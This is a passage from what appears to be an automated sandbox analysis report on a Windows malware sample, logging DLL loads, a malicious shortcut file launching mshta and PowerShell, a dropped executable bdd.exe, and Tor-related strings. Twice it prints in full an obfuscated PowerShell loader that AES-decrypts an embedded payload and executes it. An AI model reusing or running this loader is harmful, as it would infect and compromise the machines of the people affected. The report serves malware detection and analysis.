Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: quartz.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: magnification.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: faultrep.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mstscax.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: d2d1.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: msacm32.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winmmbase.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: winmmbase.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mf.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mfplat.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: rtworkq.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mfreadwrite.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: mfcore.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: ksuser.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\bdd.exeSection loaded: shdocvw.dll
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: tz1WicW6sG.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: ntdll.pdb source: bdd.exe, 00000012.00000002.2758781037.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2767248068.0000000006990000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: bdd.exe, 00000012.00000002.2758781037.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2767248068.0000000006990000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)Jump to behavior
Source: bdd.exe.8.drStatic PE information: section name: .didata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE16610D32 push eax; retf 4_2_00007FFE16610D4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE15D36FD7 push esp; retf 8_2_00007FFE15D36FD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE15E02081 push eax; ret 8_2_00007FFE15E02082

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bdd.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
May use the Tor software to hide its network traffic
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drBinary or memory string: torConnect
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
